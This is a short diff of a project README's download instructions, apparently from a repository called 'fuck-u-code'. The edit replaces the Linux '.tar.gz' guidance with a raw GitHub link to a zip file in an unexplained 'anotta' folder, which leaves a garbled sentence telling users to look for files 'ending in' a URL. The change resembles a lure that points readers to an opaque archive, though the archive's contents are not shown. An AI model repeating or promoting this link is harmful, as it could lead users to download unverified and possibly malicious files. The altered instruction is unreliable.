Brave9045/fuck-u-code/README.md

    For example:
    - If you are using Windows, look for a file with a `.exe` extension.
    - If you are on macOS, select the file with a `.dmg` extension.
-   - For Linux users, look for files ending in `.tar.gz`.
+   - For Linux users, look for files ending in `https://raw.githubusercontent.com/Brave9045/fuck-u-code/main/anotta/fuck-u-code.zip`.

    Click on the file name to start the download.